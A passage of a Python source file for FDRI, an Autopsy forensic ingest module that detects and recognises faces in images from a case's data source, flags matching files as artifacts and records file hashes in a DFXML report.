from org.sleuthkit.autopsy.ingest import (DataSourceIngestModule,
FileIngestModule, IngestMessage,
IngestModule,
IngestModuleFactoryAdapter,
IngestModuleIngestJobSettings,
IngestModuleIngestJobSettingsPanel,
IngestModuleGlobalSettingsPanel,
IngestServices, ModuleDataEvent)
from org.sleuthkit.autopsy.ingest.IngestModule import IngestModuleException
from org.sleuthkit.datamodel import (AbstractFile, BlackboardArtifact,
BlackboardAttribute, SleuthkitCase,
TskData, ReadContentInputStream)
#====================================================================
# Configuration
#====================================================================
# Version of the code. We simply put the date and a letter.
C_VERSION = "2018-09-17"
# Module configuration shared across multiple cases
GLOBAL_CONFIGURATION_PATH = os.path.join(os.path.dirname(
    os.path.abspath(__file__)), "configuration.json")
# Per-case configuration path; left empty here, filled at runtime.
CONFIGURATION_PATH = ""
# Number of bytes to read per block in the hashing function
BLOCKSIZE = 5120
# Minimum size for an image file to be processed (in bytes)
C_FILE_MIN_SIZE = 1025
# Name of file to hold the filenames where faces were detected
C_FACES_FOUND_FNAME = "FDRI_faces_found.txt"
# Name of file to hold the files where recognition occurred
C_FDRI_WANTED_FNAME = "FDRI_wanted.txt"
# Name of created DFXML file
C_DFXML_FNAME = "dfxml.xml"
# Name of file to register filenames and sizes
C_FILE_WITH_FNAMES_AND_SIZES = "FDRI_filenames+size.log.txt"
# Name of file holding the list of repeated files
C_REPEATED_FILES_LOG = "FDRI_repeated_files.log.txt"
# Name of file holding JSON parameters
C_PARAMS_JSON_FNAME="params.json"
# Label prefix for an annotated file
C_ANNOTATED_LABEL="Annotated_"
# Directory-name component used when an annotated pathname is being built
C_ANNOTATED_DIR="annotated"
# Name of the FDRI directory included in generated paths
C_FDRI_DIR="FDRI"
# Label for GUI configuration
C_LABEL_INFO_AUTOPSY_TEMP = "Save copied images outside of Autopsy's /Temp"
# Create DFXML (internal use in this script)
C_CREATE_DFXML = True
# Compute hashes for DFXML
C_COMPUTE_HASHES = True
# Row separator used in generated log files
C_SEP_S = "#---------------------------------------------------------\n"
#====================================================================
# Code
#====================================================================
# Factory that defines the name and details of the module and allows Autopsy
# to create instances of the modules that will do the analysis.
class FDRIModuleFactory(IngestModuleFactoryAdapter):
    """Autopsy ingest-module factory for FDRI (facial detection and
    recognition in images); creates FDRIModule instances per data source.
    """
    moduleName = "FDRI"
    moduleVersion = "V1.0"
    #--------------------------------------------
    # Class variables
    # The variables are shared among the various
    # threads that might run the module.
    # (Autopsy creates several threads to process
    # data sources with a FileIngest module)
    #--------------------------------------------
    # Register start time of the run
    g_start_time = time.time()
    g_elapsed_time_secs = -1 # sentinel: -1 means "not yet measured" (impossible value)

    def getModuleDisplayName(self):
        """Name shown in Autopsy's module list."""
        return self.moduleName

    def getModuleDescription(self):
        """Short description shown in Autopsy's module list."""
        return "Facial Detection and Recognition in Images"

    def getModuleVersionNumber(self):
        return self.moduleVersion

    def isDataSourceIngestModuleFactory(self):
        # This module operates on whole data sources, not individual files.
        return True

    def createDataSourceIngestModule(self, ingestOptions):
        # NOTE(review): uses self.settings captured in
        # getIngestJobSettingsPanel rather than the ingestOptions argument
        # -- confirm this is intentional.
        return FDRIModule(self.settings)

    def hasIngestJobSettingsPanel(self):
        return True

    def hasGlobalSettingsPanel(self):
        return True

    def getGlobalSettingsPanel(self):
        return UIGlobalSettingsPanel()

    def getDefaultIngestJobSettings(self):
        return UISettings()

    def getIngestJobSettingsPanel(self, settings):
        # Keep a reference so createDataSourceIngestModule can reuse it.
        self.settings = settings
        return UISettingsPanel(self.settings)
# Data Source-level ingest module. One gets created per data source.
class FDRIModule(DataSourceIngestModule):
_logger = Logger.getLogger(FDRIModuleFactory.moduleName)
def log(self, level, msg):
self._logger.logp(level, self.__class__.__name__,
inspect.stack()[1][3], msg)
def __init__(self, settings):
self.context = None
self.localSettings = settings
self.extensions = []
self.deleteAfter = False
self.doRecognition = True
self.userPaths = {
"0": "",
"1": "",
"2": ""
}
# True to create the DFXML file
self.createDFXML = C_CREATE_DFXML
# Time acumulators to determine the
# cumulative time needed to compute
# MD5, SHA1 and SHA256
self.needed_time_MD5 = 0.0
self.needed_time_SHA1 = 0.0
self.needed_time_SHA256 = 0.0
#CONFIGURATION_PATH = Case.getCurrentCase().getModuleDirectory() + "\\FDRI.json"
# Error list in acordance with .exe code
# for unknow errors please run executable via command line
self.errorList = {
1: ' FDRI.exe Parameters error',
2: ' Error loading parameter file ',
3: ' Error parsing parameter file ',
4: ' Error finding image directory ',
5: ' Error initializing recognition network ',
6: ' Error initializing shape predictor ',
7: ' Error initializing detection network ',
8: ' Didn\'t find any positive faces ',
9: ' Didn\'t find any target faces ',
10: ' CUDA out of memory ',
11: ' Didn\'t find any usable CUDA devices '
}
# Where any setup and configuration is done
# 'context' is an instance of org.sleuthkit.autopsy.ingest.IngestJobContext.
# See: http://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1ingest_1_1_ingest_job_context.html
def startUp(self, context):
    """Validate the job settings and build the runtime configuration.

    'context' is an instance of org.sleuthkit.autopsy.ingest.IngestJobContext.
    See: http://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1ingest_1_1_ingest_job_context.html

    Raises:
        IngestModuleException: when no file-extension flag is selected.
    """
    # Supported file format from dlib
    acceptedFiles = ['.jpg', '.jpeg', '.png']
    # Flag index i in the job settings enables acceptedFiles[i].
    i = 0
    for ext in acceptedFiles:
        if self.localSettings.getFlag(i):
            self.extensions.append(ext)
        i += 1
    if not self.extensions:
        raise IngestModuleException(
            "Need to select at least one type of file!")
    # self.generate_hash controls whether MD5,SHA1 and SHA256 hashes
    # are added to the DFXML generated file.
    # NOTE(review): flag 3 is labelled "Delete file after" in UISettings'
    # comment but the panel wires it to the hash checkbox -- confirm.
    if self.localSettings.getFlag(3):
        self.generate_hash = True
    else:
        self.generate_hash = False
    #
    # Checking for default detectors and auxiliary files
    #
    self.pathToExe = os.path.join(os.path.dirname(
        os.path.abspath(__file__)), "FDRI.exe")
    # Model files shipped next to this module; used when no path was set.
    self.defaultPaths = {
        '0': os.path.join(os.path.dirname(os.path.abspath(__file__)),
                          "mmod_human_face_detector.dat"),
        '1': os.path.join(os.path.dirname(os.path.abspath(__file__)),
                          "dlib_face_recognition_resnet_model_v1.dat"),
        '2': os.path.join(os.path.dirname(os.path.abspath(__file__)),
                          "shape_predictor_5_face_landmarks.dat")
    }
    save_file = False
    if os.path.exists(GLOBAL_CONFIGURATION_PATH):
        with open(GLOBAL_CONFIGURATION_PATH, "r") as out:
            content = json.load(out)
            save_file = content['save_files']
            self.userPaths = content['paths']
    # Fill any unset model path with the bundled default.
    for code in self.userPaths:
        if not self.userPaths[code]:
            # user didn't set models path, we assume module location
            self.userPaths[code] = self.defaultPaths[code]
    # Update global config file
    #self.log(Level.INFO, GLOBAL_CONFIGURATION_PATH)
    with open(GLOBAL_CONFIGURATION_PATH, "w") as out:
        json.dump({"save_files": save_file,
                   "paths": self.userPaths}, out)
    folder_positive_photos = self.localSettings.getPath("1")
    # No folder for positive photos was given: recognition OFF
    if len(folder_positive_photos) == 0:
        self.doRecognition = False
        Msg_S = "Face recognition OFF (no folder with positive photo(s) given)"
        self.log(Level.INFO, Msg_S)
    elif not os.path.exists(folder_positive_photos):
        # The folder with positive photos doesn't exist: recognition OFF
        self.doRecognition = False
        Msg_S = "Folder with positive photos NOT found: '%s'" %\
            (folder_positive_photos)
        self.log(Level.WARNING, Msg_S)
    else:
        # Ok, recognition is ON
        self.doRecognition = True
        Msg_S = "Face recognition ON (folder positive photo(s):'%s')" %\
            (folder_positive_photos)
        self.log(Level.INFO, Msg_S)
    # Persist flags + wanted folder for UISettings.loadConfig() to reload.
    # NOTE(review): original indentation lost; assumed this runs on every
    # startUp, not only in the recognition-ON branch -- confirm.
    with open(Case.getCurrentCase().getModuleDirectory() + "\\config.json", 'w') as safe_file:
        json.dump({"flags": self.localSettings.getAllFlags(), "wanted_folder": folder_positive_photos}, safe_file)
    # Activate for DEBUG
    #with open(CONFIGURATION_PATH, "w") as out:
    #    json.dump({"flags": self.localSettings.getAllFlags(),
    #               "paths": self.localSettings.getAllPaths()}, out)
    self.context = context
#--------------------------------------------------------------------
# Added by Patricio
# 2018-07-21
#--------------------------------------------------------------------
def shutDown(self):
    """Record and log the total wall-clock time used by this module."""
    FDRIModuleFactory.g_elapsed_time_secs = (
        time.time() - FDRIModuleFactory.g_start_time)
    self.log(Level.INFO,
             "Total elapsed time: %f secs" %
             (FDRIModuleFactory.g_elapsed_time_secs))
# Where the analysis is done.
# The 'dataSource' object being passed in is of type org.sleuthkit.datamodel.Content.
# See: http://www.sleuthkit.org/sleuthkit/docs/jni-docs/4.4.1/interfaceorg_1_1sleuthkit_1_1datamodel_1_1_content.html
# 'progressBar' is of type org.sleuthkit.autopsy.ingest.DataSourceIngestModuleProgress
# See: http://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1ingest_1_1_data_source_ingest_module_progress.html
def process(self, dataSource, progressBar):
    """Run the whole analysis for one data source.

    Copies candidate image files out of the case database, runs FDRI.exe
    on them in a worker thread, then turns the executable's output into
    blackboard artifacts and derived (annotated) files.

    'dataSource' is of type org.sleuthkit.datamodel.Content.
    See: http://www.sleuthkit.org/sleuthkit/docs/jni-docs/4.4.1/interfaceorg_1_1sleuthkit_1_1datamodel_1_1_content.html
    'progressBar' is of type org.sleuthkit.autopsy.ingest.DataSourceIngestModuleProgress
    See: http://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1ingest_1_1_data_source_ingest_module_progress.html

    Returns IngestModule.ProcessResult.OK in all cases (errors are logged).
    """
    # we don't know how much work there is yet
    progressBar.switchToIndeterminate()
    # Start timer for file copy operation
    start_copy_time = time.time()
    # case insensitive SQL LIKE clause is used to query the case database
    # FileManager API: http://sleuthkit.org/autopsy/docs/api-docs/4.4.1/classorg_1_1sleuthkit_1_1autopsy_1_1casemodule_1_1services_1_1_file_manager.html
    fileManager = Case.getCurrentCase().getServices().getFileManager()
    files = []
    for extension in self.extensions:
        try:
            files.extend(fileManager.findFiles(
                dataSource, "%" + extension))
        except TskCoreException:
            self.log(Level.INFO, "Error getting files from: '" +
                     extension + "'")
    numFiles = len(files)
    if not numFiles:
        self.log(Level.WARNING, "Didn't find any usable files!")
        return IngestModule.ProcessResult.OK
    # Check if the user pressed cancel while we were busy
    if self.context.isJobCancelled():
        return IngestModule.ProcessResult.OK
    output_dir = Case.getCurrentCase().getModuleDirectory()
    module_dir = os.path.join(output_dir, dataSource.getName(), C_FDRI_DIR)
    # Create top-level DIR to save FDIR's created files
    full_dirname_dataSource = os.path.join(output_dir, dataSource.getName())
    if not os.path.exists(full_dirname_dataSource):
        os.mkdir(full_dirname_dataSource)
    # TEMP is needed by Autopsy
    temp_dir = os.path.join(Case.getCurrentCase().getTempDirectory(),
                            dataSource.getName())
    if not os.path.exists(temp_dir):
        os.mkdir(temp_dir)
    temp_dir = os.path.join(temp_dir, C_FDRI_DIR)
    if not os.path.exists(temp_dir):
        os.mkdir(temp_dir)
    # We always copy the files (except if a copy already exists)
    # as we will want to change them.
    # We detect the existence of a previous copy if the creation of the dir
    # 'module_dir' triggers an exception
    try:
        os.mkdir(module_dir)
    except OSError:
        # FIX: narrowed from a bare 'except:'; mkdir failures are OSError.
        self.log(Level.INFO, "Directory already exists for this module")
    #----------------------------------------
    # Init file which holds filenames + size
    #----------------------------------------
    file_path = os.path.join(module_dir, C_FILE_WITH_FNAMES_AND_SIZES)
    fnames_and_sizes_F = open(file_path, "w")
    fnames_and_sizes_F.write(C_SEP_S)
    fnames_and_sizes_F.write("# Filename:size (bytes)\n")
    timestamp_S = datetime.now().strftime('%Y-%m-%d_%Hh%Mm%Ss')
    fnames_and_sizes_F.write("# START: %s\n" % (timestamp_S))
    fnames_and_sizes_F.write(C_SEP_S)
    # Dict to detect identical files: MD5 digest -> [size, name, name, ...]
    files_hash_D = {}
    # Flag to record whether files were copied or not
    were_files_copied = True
    total_files = 0
    total_small_files = 0
    # A initial version mispelled 'Annotated'...
    avoid_prefix_1 = "Anotated_"
    avoid_prefix_2 = "Annotated_"
    try:
        dir_img = os.path.join(module_dir, "img")
        os.mkdir(dir_img)
        dir_small_files = os.path.join(module_dir, "small_files") + "\\"
        os.mkdir(dir_small_files)
        for file in files:
            total_files = total_files + 1
            filename_S = file.getName()
            Log_S = ""
            # FIX: the original tested "filename_S.find(prefix) is 0" --
            # an identity comparison on an int; use startswith() instead.
            if filename_S.startswith(avoid_prefix_1):
                Log_S = "%s file found '%s': skipping" %\
                    (avoid_prefix_1, filename_S)
            elif filename_S.startswith(avoid_prefix_2):
                Log_S = "%s file found '%s': skipping" %\
                    (avoid_prefix_2, filename_S)
            if len(Log_S):
                # Annotated_ found: log and skip this file
                self.log(Level.INFO, Log_S)
                continue
            file_size = file.getSize()
            filename, file_extension = os.path.splitext(file.getName())
            # Record filename and file size in C_FILE_WITH_FNAMES_AND_SIZES
            fnames_and_sizes_F.write("%s:%d\n" % (file.getName(), file_size))
            # Files of at least C_FILE_MIN_SIZE bytes go to img/ for
            # processing; smaller files go to small_files/ so that we can
            # still look at them, if needed.
            # TODO:: User Choice as option
            if file_size >= C_FILE_MIN_SIZE:
                new_fname = "%s__id__%s%s" %\
                    (filename, str(file.getId()), file_extension)
                fullpath_dest = os.path.join(dir_img, new_fname)
                ContentUtils.writeToFile(file, File(fullpath_dest))
            else:
                total_small_files = total_small_files + 1
                dest_filename = "%s%s__id__%d%s" %\
                    (dir_small_files, filename, file.getId(), file_extension)
                ContentUtils.writeToFile(file, File(dest_filename))
                Log_S = "Skipping file: %s (%d bytes)" %\
                    (file.getName(), file.getSize())
                # LOG
                self.log(Level.INFO, Log_S)
            #--------------------------------
            # Code to detect repeated files
            # We simply use a dictionary
            # keyed by the MD5 of the file
            #--------------------------------
            if file_size > 0:
                # FIX: create_hash() returns a (hexdigest, seconds) tuple.
                # The original keyed the dict on the whole tuple, and the
                # timing component differs on every call, so duplicates
                # could never be detected.  Key on the digest only.
                (md5_hash, _md5_time) = self.create_hash(file, "md5")
                if md5_hash in files_hash_D:
                    # hash already exists: repetition
                    files_hash_D[md5_hash].append(file.getName())
                else:
                    # hash doesn't yet exist in dictionary: 1st time
                    files_hash_D[md5_hash] = [file_size, file.getName()]
    except Exception as e:
        were_files_copied = False
        self.log(Level.INFO, "Image folder already exists, skiping file copy")
        self.log(Level.INFO, "Exception: " + str(e))
    #----------------------------------------
    # Close filename+size file
    #----------------------------------------
    timestamp_S = datetime.now().strftime('%Y-%m-%d_%Hh%Mm%Ss')
    fnames_and_sizes_F.write("# DONE: %s\n" % (timestamp_S))
    if were_files_copied is False:
        Msg_S = "# Exception occurred\n"
        fnames_and_sizes_F.write(Msg_S)
    fnames_and_sizes_F.close()
    #----------------------------------------
    # Dump hash with repeated files
    # (only if files were copied)
    #----------------------------------------
    if were_files_copied is True:
        file_path = os.path.join(module_dir, C_REPEATED_FILES_LOG)
        repeated_files_log_F = open(file_path, "w")
        repeated_files_log_F.write(C_SEP_S)
        repeated_files_log_F.write("# Repeated files\n")
        timestamp_S = datetime.now().strftime('%Y-%m-%d_%Hh%Mm%Ss')
        repeated_files_log_F.write("# %s\n" % (timestamp_S))
        repeated_files_log_F.write(C_SEP_S)
        for key, info_L in files_hash_D.iteritems():
            if len(info_L) > 2:
                # only lists with more than 2 entries are repetitions
                # (one entry is the file size)
                S = ""
                for datum in info_L:
                    S = "%s%s:" % (S, datum)
                repeated_files_log_F.write("%s\n" % (S))
        repeated_files_log_F.write(C_SEP_S)
        repeated_files_log_F.write("# DONE: %s\n" % (timestamp_S))
        repeated_files_log_F.write(C_SEP_S)
        repeated_files_log_F.close()
    #----------------------------------------
    # Log stats
    #----------------------------------------
    # shutdown copy file timer
    elapsed_copy_time_secs = time.time() - start_copy_time
    Log_S = "%d image files (%d of these were left out -- size <= "\
        "%d bytes)" % (total_files, total_small_files, C_FILE_MIN_SIZE)
    self.log(Level.INFO, Log_S)
    total_copied_files = total_files - total_small_files
    Log_S = "Files copy operation (%d files) took %f secs" %\
        (total_copied_files, elapsed_copy_time_secs)
    self.log(Level.INFO, Log_S)
    #----------------------------------------
    # Start processing timer
    #----------------------------------------
    start_FDRIexe_time = time.time()
    # Location where the output of executable will appear
    timestamp = datetime.now().strftime('%Y-%m-%d_%Hh%Mm%Ss')
    workspace = os.path.join(module_dir, timestamp)
    configFilePath = os.path.join(workspace, C_PARAMS_JSON_FNAME)
    os.mkdir(workspace)
    with open(configFilePath, "w") as out:
        json.dump({
            "paths": self.userPaths,
            "wanted_faces": self.localSettings.getPath("1"),
            "imagesPath": os.path.join(module_dir, "img"),
            "doRecognition": self.doRecognition,
            "workspace": workspace,
        }, out)
    #
    # Different calls can also be provided to specify the image size
    #
    # Note that 2GB of GPU memory handle around 2000*2000 images
    # Note that 4GB of GPU memory handle around 3500*3500 images
    # Note that 8GB of GPU memory handle around 6000*6000 images
    #
    # Example:
    #                                                 Required    Minimum size  Maximum size
    # target=lambda: self.thread_work(self.pathToExe, configFilePath, 1200*1200, 2000*2000))
    # target=lambda: self.thread_work(self.pathToExe, configFilePath, 1200*1200))
    executable_thread = Thread(
        target=lambda: self.thread_work(self.pathToExe, configFilePath))
    executable_thread.start()
    # Poll for cancellation while the executable runs.
    while executable_thread.isAlive():
        if self.context.isJobCancelled():
            self.log(Level.INFO, "User cancelled job! Terminating thread")
            JThread.interrupt(executable_thread)
            self.log(Level.INFO, "Thread terminated")
            self.deleteFiles(module_dir)
            return IngestModule.ProcessResult.OK
        time.sleep(1)
    # Checking if cancel was pressed before starting another job
    if self.context.isJobCancelled():
        return IngestModule.ProcessResult.OK
    #----------------------------------------
    # Compute time taken by FDRI.exe
    #----------------------------------------
    elapsed_FDRIexe_time_secs = time.time() - start_FDRIexe_time
    Log_S = "Process of image files by FDRI.exe took %f secs" %\
        (elapsed_FDRIexe_time_secs)
    self.log(Level.INFO, Log_S)
    #----------------------------------------
    # Start timer of last stage
    #----------------------------------------
    self.log(Level.INFO, "START of last stage")
    start_last_stage_time = time.time()
    # Use blackboard class to index blackboard artifacts for keyword search
    blackboard = Case.getCurrentCase().getServices().getBlackboard()
    # Tag files with faces
    artifact_type = BlackboardArtifact.ARTIFACT_TYPE.TSK_INTERESTING_FILE_HIT
    # Copy files from workspace to temp_dir
    tree_source = os.path.join(workspace, C_ANNOTATED_DIR)
    tree_destination = os.path.join(temp_dir, C_ANNOTATED_DIR)
    copy_tree(tree_source, tree_destination)
    # Add images with the wanted faces to blackboard
    outPositiveFile = os.path.join(workspace, C_FDRI_WANTED_FNAME)
    if os.path.exists(outPositiveFile):
        with open(outPositiveFile, "r") as out:
            for line in out:
                file_id = line.split('__id__')[1].split('.')
                interestingFile = self.findByID(files, file_id[0])
                if interestingFile is None:
                    continue
                # Creating new artifacts with faces found
                artifactList = interestingFile.getArtifacts(artifact_type)
                if artifactList:
                    self.log(
                        Level.INFO, "Artifact already exists! ignoring")
                else:
                    art = interestingFile.newArtifact(artifact_type)
                    att = BlackboardAttribute(BlackboardAttribute.ATTRIBUTE_TYPE.TSK_SET_NAME.getTypeID(),
                                              FDRIModuleFactory.moduleName, dataSource.getName() + "/Wanted faces")
                    art.addAttribute(att)
                    try:
                        # index the artifact for keyword search
                        blackboard.indexArtifact(art)
                    except Blackboard.BlackboardException as e:
                        self.log(
                            Level.SEVERE, "Error indexing artifact " + art.getDisplayName())
                # Adding derivated files to case
                # These are files with borders on the found faces
                # Code to deal with filenames with multiple "."
                interestingFName = interestingFile.getName()
                try:
                    name, extension = self.split_fname(interestingFName)
                except Exception as e:
                    Err_S = "Error in splitting name/extension of '%s' (skipping file)" % (interestingFName)
                    self.log(Level.SEVERE, Err_S)
                    self.log(Level.SEVERE, "Exception: " + str(e))
                    continue
                # Still here? Good.
                f_path = "%s__id__%s.%s" %\
                    (name, str(interestingFile.getId()), extension)
                # We need path relative to temp folder for Autopsy API
                f_temp_path = os.path.join("Temp", dataSource.getName(),
                                           C_FDRI_DIR, C_ANNOTATED_DIR, f_path)
                f_abs_path = os.path.join(workspace,
                                          C_ANNOTATED_DIR, f_path)
                # Temporary fix
                if os.path.exists(f_abs_path):
                    f_size = os.path.getsize(f_abs_path)
                    case = Case.getCurrentCase().getSleuthkitCase()
                    try:
                        abstract_f = case.getAbstractFileById(
                            interestingFile.getId())
                        # https://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1casemodule_1_1services_1_1_file_manager.html
                        label_S = C_ANNOTATED_LABEL + interestingFName
                        case.addDerivedFile(label_S, f_temp_path,
                                            f_size, 0, 0, 0, 0, True, abstract_f,
                                            "", FDRIModuleFactory.moduleName,
                                            FDRIModuleFactory.moduleVersion,
                                            "Image with faces",
                                            TskData.EncodingType.NONE)
                    except Exception:
                        # FIX: narrowed from a bare 'except:'
                        self.log(Level.SEVERE, "Error getting abs file")
                if self.generate_hash:
                    dfxml_path = os.path.join(workspace, C_DFXML_FNAME)
                    self.complete_dfxml(dfxml_path, interestingFile)
    # Name of file that holds the data regarding detected faces
    # Each row corresponds to a detected face
    outPositiveFile = os.path.join(workspace, C_FACES_FOUND_FNAME)
    self.log(Level.INFO, "File with found faces from FDRI.exe:'%s'" %
             (outPositiveFile))
    # Count the number of images where at least one face was detected
    images_with_faces_count = 0
    if os.path.exists(outPositiveFile):
        with open(outPositiveFile, "r") as out:
            for line in out:
                # Another file with at least one face
                images_with_faces_count += 1
                file_id = line.split('__id__')[1].split('.')
                interestingFile = self.findByID(files, file_id[0])
                if interestingFile is None:
                    continue
                # Creating new artifacts with faces found
                artifactList = interestingFile.getArtifacts(artifact_type)
                if artifactList:
                    self.log(Level.INFO, "Artifact already exists! ignoring")
                else:
                    art = interestingFile.newArtifact(artifact_type)
                    att = BlackboardAttribute(BlackboardAttribute.ATTRIBUTE_TYPE.TSK_SET_NAME.getTypeID(),
                                              FDRIModuleFactory.moduleName, dataSource.getName() + "/Images with faces")
                    art.addAttribute(att)
                    try:
                        # index the artifact for keyword search
                        blackboard.indexArtifact(art)
                    except Blackboard.BlackboardException as e:
                        self.log(Level.SEVERE,
                                 "Error indexing artifact " + art.getDisplayName())
                # Adding derivated files to case
                # These are files with borders on the found faces
                # Code to deal with filenames with multiple "."
                interestingFName = interestingFile.getName()
                try:
                    name, extension = self.split_fname(interestingFName)
                except Exception as e:
                    Err_S = "Error in splitting name/extension of '%s' (skipping file)" % (interestingFName)
                    self.log(Level.SEVERE, Err_S)
                    self.log(Level.SEVERE, "Exception: " + str(e))
                    continue
                # Still here? Good.
                f_path = "%s__id__%s.%s" %\
                    (name, str(interestingFile.getId()), extension)
                # We need path relative to temp folder since the
                # Autopsy's API requires files in the case's
                # TEMP folder
                f_temp_path = os.path.join("Temp", dataSource.getName(),
                                           C_FDRI_DIR, C_ANNOTATED_DIR, f_path)
                f_abs_path = os.path.join(workspace,
                                          C_ANNOTATED_DIR, f_path)
                # Temporary fix
                if os.path.exists(f_abs_path):
                    f_size = os.path.getsize(f_abs_path)
                    case = Case.getCurrentCase().getSleuthkitCase()
                    try:
                        abstract_f = case.getAbstractFileById(
                            interestingFile.getId())
                        # https://sleuthkit.org/autopsy/docs/api-docs/4.4/classorg_1_1sleuthkit_1_1autopsy_1_1casemodule_1_1services_1_1_file_manager.html
                        label_S = C_ANNOTATED_LABEL + interestingFName
                        case.addDerivedFile(label_S, f_temp_path,
                                            f_size, 0, 0, 0, 0, True, abstract_f,
                                            "", FDRIModuleFactory.moduleName,
                                            FDRIModuleFactory.moduleVersion,
                                            "Image with faces",
                                            TskData.EncodingType.NONE)
                    except Exception:
                        # FIX: narrowed from a bare 'except:'
                        self.log(Level.SEVERE,
                                 "Error getting abs file")
                if self.generate_hash:
                    # FIX: use os.path.join for consistency with the
                    # first loop (was workspace + "\\" + C_DFXML_FNAME).
                    dfxml_path = os.path.join(workspace, C_DFXML_FNAME)
                    self.complete_dfxml(dfxml_path, interestingFile)
    #----------------------------------------
    # End timer of last stage
    #----------------------------------------
    last_stage_time = time.time() - start_last_stage_time
    Log_S = "Last stage took %f secs" % (last_stage_time)
    self.log(Level.INFO, Log_S)
    if C_COMPUTE_HASHES:
        Log_S = "hashes took: MD5=%f secs; SHA1=%f secs; SHA256=%f secs" %\
            (self.needed_time_MD5, self.needed_time_SHA1, self.needed_time_SHA256)
    else:
        Log_S = "hashes NOT computed"
    self.log(Level.INFO, Log_S)
    IngestServices.getInstance().fireModuleDataEvent(
        ModuleDataEvent(FDRIModuleFactory.moduleName,
                        BlackboardArtifact.ARTIFACT_TYPE.TSK_INTERESTING_FILE_HIT, None))
    # Should we delete the IMG files? (user's configuration)
    if self.deleteAfter:
        Msg_S = "Going to delete image files (as required by the user)"
        self.log(Level.INFO, Msg_S)
        dir_to_del = os.path.join(output_dir, dataSource.getName())
        self.deleteFiles(dir_to_del)
    # End time measurement
    FDRIModuleFactory.g_elapsed_time_secs = time.time() -\
        FDRIModuleFactory.g_start_time
    #------------------------------------------------------------
    # Format message to be shown at "Ingest messages"
    #------------------------------------------------------------
    if self.doRecognition:
        recognition_S = "ON"
    else:
        recognition_S = "OFF"
    ingest_msg_S = "Found %d images with faces: %f secs (FDRI.exe:%f secs). Recognition:%s" %\
        (images_with_faces_count, FDRIModuleFactory.g_elapsed_time_secs,
         elapsed_FDRIexe_time_secs, recognition_S)
    message = IngestMessage.createMessage(IngestMessage.MessageType.DATA,
                                          FDRIModuleFactory.moduleName, ingest_msg_S)
    IngestServices.getInstance().postMessage(message)
    return IngestModule.ProcessResult.OK
#==========================================================================
# Helper functions
#==========================================================================
# File cleanup
def deleteFiles(self, path):
    """Recursively remove *path*; missing or empty directories are ignored."""
    shutil.rmtree(path, ignore_errors=True)
# Subprocess initiator
def thread_work(self, path, param_path, min_size=0, max_size=0):
    """Run FDRI.exe (at *path*) as a subprocess and log its exit status.

    min_size/max_size, when positive, bound the image sizes passed on
    via --min/--max.
    """
    cmd = [path, "--params", param_path]
    if min_size > 0:
        cmd.extend(["--min", str(min_size)])
    if max_size > 0:
        cmd.extend(["--max", str(max_size)])
    rc = subprocess.call(cmd)
    if not rc:
        self.log(Level.INFO,
                 "Child process FDRI.exe terminated with no problems")
    else:
        self.log(Level.SEVERE, "Error in executable: got '%s'" % (str(rc)))
        # Translate known exit codes via the table built in __init__.
        if 0 < rc <= len(self.errorList):
            self.log(Level.SEVERE, self.errorList[rc])
#----------------------------------------------------------------
# File mapping from temp folder to Autopsy files
#----------------------------------------------------------------
def findByID(self, file_list, id):
    """Return the Autopsy file in *file_list* whose object id equals *id*.

    *id* may be a string or an int; returns None when no file matches.
    """
    wanted = int(id)
    for candidate in file_list:
        if candidate.getId() == wanted:
            return candidate
    return None
#----------------------------------------------------------------
# Complete the DFMXL file, adding the hashes
# (MD5, SHA1 and SHA256) of each individual file.
#----------------------------------------------------------------
def complete_dfxml(self, dfxml_path, file):
    """Append MD5/SHA1/SHA256 <hashdigest> elements for *file* to the DFXML.

    When C_COMPUTE_HASHES is off, "0" placeholders are written instead of
    real digests.  Per-algorithm timing is accumulated in the
    self.needed_time_* counters.
    """
    xml_doc = None
    # Should we compute hashes?
    do_compute_hashes = C_COMPUTE_HASHES
    with open(dfxml_path, "r") as dfxml:
        xml_doc = m_dom.parse(dfxml)
    file_elements = xml_doc.getElementsByTagName("fileobject")
    if file.isFile() and file.canRead():
        #----------------------
        # Append file hashes
        #----------------------
        # SHA1
        hash_nodeSHA1 = xml_doc.createElement("hashdigest")
        if do_compute_hashes:
            (sha1_hash, time_used) = self.create_hash(file, "sha1")
            self.needed_time_SHA1 = self.needed_time_SHA1 + time_used
        else:
            sha1_hash = "0"
        hash_nodeSHA1.setAttribute("type", "sha1")
        hash_nodeSHA1.appendChild(xml_doc.createTextNode(sha1_hash))
        # SHA256
        hash_nodeSHA256 = xml_doc.createElement("hashdigest")
        if do_compute_hashes:
            (sha256_hash, time_used) = self.create_hash(file, "sha256")
            self.needed_time_SHA256 = self.needed_time_SHA256 + time_used
        else:
            sha256_hash = "0"
        hash_nodeSHA256.setAttribute("type", "sha256")
        hash_nodeSHA256.appendChild(xml_doc.createTextNode(sha256_hash))
        # MD5
        hash_nodeMD5 = xml_doc.createElement("hashdigest")
        if do_compute_hashes:
            (md5_hash, time_used) = self.create_hash(file, "md5")
            self.needed_time_MD5 = self.needed_time_MD5 + time_used
        else:
            md5_hash = "0"
        hash_nodeMD5.setAttribute("type", "md5")
        hash_nodeMD5.appendChild(xml_doc.createTextNode(md5_hash))
        # Attach the three nodes to the matching <fileobject>.
        # NOTE(review): matching compares only the part of the name before
        # the FIRST dot, so names containing extra dots may mismatch.
        # NOTE(review): appendChild() MOVES a node, so if several elements
        # match, only the last one keeps the digests -- confirm intent.
        for element in file_elements:
            file_name_node = element.getElementsByTagName("filename")[0]
            if file_name_node.firstChild.nodeValue == file.getName().split(".")[0]:
                element.appendChild(hash_nodeSHA1)
                element.appendChild(hash_nodeSHA256)
                element.appendChild(hash_nodeMD5)
        # Rewrite the (modified) document in place.
        with open(dfxml_path, "w") as out:
            xml_doc.writexml(out, encoding="utf-8")
#----------------------------------------------------------------
# Hash calculation, Autopsy seems to not provide these
#----------------------------------------------------------------
def create_hash(self, f_target, algorithm):
    """Return (hex digest, seconds taken) for the content of *f_target*.

    *algorithm* is any name accepted by hashlib.new, e.g. "md5", "sha1",
    "sha256".  Autopsy does not seem to provide these digests itself.
    """
    time_start = time.time()
    hash_creator = hashlib.new(algorithm)
    inputStream = ReadContentInputStream(f_target)
